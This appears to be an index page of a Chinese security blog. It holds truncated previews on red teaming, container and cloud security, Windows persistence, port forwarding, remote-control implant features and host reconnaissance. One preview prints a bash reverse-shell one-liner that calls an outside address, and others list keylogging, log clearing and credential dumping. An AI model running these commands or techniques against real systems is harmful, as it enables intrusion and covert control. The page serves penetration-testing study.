1.3k 2 分钟

# 概念 红蓝对抗的概念最早来源于 20 世纪 60 年代的美国演习,演习是专指军队进行大规模的实兵演习,演习中通常分为红军、蓝军,其中蓝军通常是指在部队模拟对抗演习专门扮演假想敌的部队,与红军 (代表我方正面部队) 进行针对性的训练,这种方式也被称作 Red Teaming。 网络安全红蓝对抗的概念就源自于此。红军作为企业防守方,通过安全加固、攻击监测、应急处置等手段来保障企业安全。而蓝军作为攻击方,以发现安全漏洞,获取业务权限或数据为目标,利用各种攻击手段,试图绕过红军层层防护,达成既定目标。可能会造成混淆的是,在欧美一般采用红队代表攻击方,蓝队代表防守方,颜色代表正好相反。 #...
182 1 分钟

# 文档 Kubernetes Documentation Openstack wiki NSA, CISA release Kubernetes Hardening Guidance Kubernetes Hardening Guidance Kubernetes 加固手册 # 元数据安全 Exploiting SSRF in AWS Elastic Beanstalk # 云存储 ceph ceph tracker
5.3k 6 分钟

# 虚拟化技术与容器技术 # 传统虚拟化技术 传统虚拟化技术通过添加 hypervisor 层,虚拟出网卡,内存,CPU 等虚拟硬件,再在其上建立客户机,每个客户机都有自己的系统内核。传统虚拟化技术以虚拟机为管理单元,各虚拟机拥有独立的操作系统内核,不共用宿主机的软件系统资源,因此具有良好的隔离性,适用于云计算环境中的多租户场景。 #...
404 1 分钟

# OCI 开放容器标准 (Open Container Initiative, OCI) 是用于规范容器格式和运行时行业标准。目前 OCI 提出的规范有: OCI Runtime Specification OCI Image Format OCI Distribution Specification # CRI 容器运行时 (Container Runtime Interface, CRI) 定义了容器和镜像的接口,目前官方支持的容器运行时包括 Docker、Containerd、CRI-O 和 frakti。 # 参考链接 # 文档 Introducing Container...
994 1 分钟

# Windows Windows 威胁防护 文件寄生 NTFS 文件流实际应用 Windows 中常见后门持久化方法总结 LOLBAS 渗透技巧 ——Windows 单条日志的删除 windows 取证 文件执行记录的获取和清除 Getting DNS Client Cached Entries with CIM/WMI Windows 单机 Persistence Dumping RDP Credentials # 域渗透 绕过域账户登录失败次数的限制 域渗透总结 got domain admin on internal network Mitigating...
861 1 分钟

# 端口转发 windows lcx netsh linux portmap iptables socket 代理 Win: xsocks Linux: proxychains 基于 http 的转发与 socket 代理 (低权限下的渗透) 端口转发: tunnasocks 代理: reGeorg ssh 通道 端口转发 socks # 获取 shell 常规 shell 反弹 bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 python -c 'import...
634 1 分钟

# 开发技术 管控功能实现技术 系统管理:查看系统基本信息,进程管理,服务管理 文件管理:复制 / 粘贴文件,删除文件 / 目录,下载 / 上传文件等 Shell 管理 击键记录监控 屏幕截取 音频监控 视频监控 隐秘信息查看 移动磁盘的动态监控 远程卸载 自启动技术 Windows 自启动 基于 Windows 启动目录的自启动 基于注册表的自启动 基于服务程序的自启动 基于 ActiveX 控件的自启动 基于计划任务(Scheduled Tasks)的自启动 Linux 自启动 用户态进程隐藏技术 基于 DLL...
3.3k 4 分钟

# 信息收集 # 获取内核,操作系统和设备信息 版本信息 uname -a 所有版本 uname -r 内核版本信息 uname -n 系统主机名字 uname -m Linux 内核架构 内核信息 cat /proc/version CPU 信息 cat /proc/cpuinfo 发布信息 cat /etc/*-release cat /etc/issue 主机名 hostname 文件系统 df -a 内核日志 dmesg / /var/log/dmesg # 用户和组 列出系统所有用户 cat /etc/passwd 列出系统所有组 cat...
17k 20 分钟

# 信息收集 # 基本命令 主机名 hostname 查询所有计算机名称 dsquery computer 查看配置及补丁信息 systeminfo wmic qfe get description,installedOn /format:csv 查看版本 ver 进程信息 tasklist /svc wmic process get caption,executablepath,commandline /format:csv get-process 查看所有环境变量 set 查看计划任务 schtasks /QUERY /fo LIST /v 查看安装驱动...